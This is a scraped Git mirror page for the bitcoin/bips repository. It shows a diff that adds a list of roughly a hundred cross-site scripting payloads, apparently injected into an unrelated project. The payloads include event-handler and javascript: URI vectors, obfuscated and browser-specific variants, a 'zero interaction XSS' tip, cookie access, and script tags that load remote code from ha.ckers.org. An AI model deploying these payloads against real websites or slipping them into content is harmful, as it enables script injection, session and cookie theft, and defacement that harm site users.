mirror of
https://github.com/bitcoin/bips.git
synced 2026-04-13 16:18:40 +00:00
<BODY ONLOAD=alert('XSS')>
@@ -1,2 +1,100 @@
|
||||
<img src="x" onload="prompt()">
|
||||
<img src="x" onload="prompt()">")[CLICK]("javascript:alert()")
|
||||
" onfocus="alert(1)" name="bounty
|
||||
(Append #bounty to the URL and enjoy your zero interaction XSS )
|
||||
|
||||
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
|
||||
|
||||
# Internet Explorer, Edge
|
||||
<svg><script>alert(1)<p>
|
||||
|
||||
# Firefox
|
||||
|
||||
<svg><x><script>alert(1)</x>
|
||||
|
||||
# Common
|
||||
|
||||
'';!--"<XSS>=&{()}
|
||||
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
|
||||
<a onmouseover="alert(document.cookie)">xxs link</a>
|
||||
|
||||
<a onmouseover=alert(document.cookie)>xxs link</a>
|
||||
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
|
||||
<IMG SRC=# onmouseover="alert('xxs')">
|
||||
|
||||
<IMG SRC= onmouseover="alert('xxs')">
|
||||
|
||||
<IMG onmouseover="alert('xxs')">
|
||||
|
||||
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
|
||||
|
||||
<IMG SRC=javascript:alert(
|
||||
'XSS')>
|
||||
|
||||
<IMG SRC=javascript:a&
|
||||
#0000108ert('XSS')>
|
||||
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
|
||||
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
|
||||
|
||||
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
|
||||
<iframe src=http://ha.ckers.org/scriptlet.html <
|
||||
|
||||
\";alert('XSS');//
|
||||
|
||||
|
||||
|
||||
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
||||
|
||||
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
|
||||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
|
||||
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
|
||||
<IMG SRC="livescript:[code]">
|
||||
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
Reference in New Issue
Block a user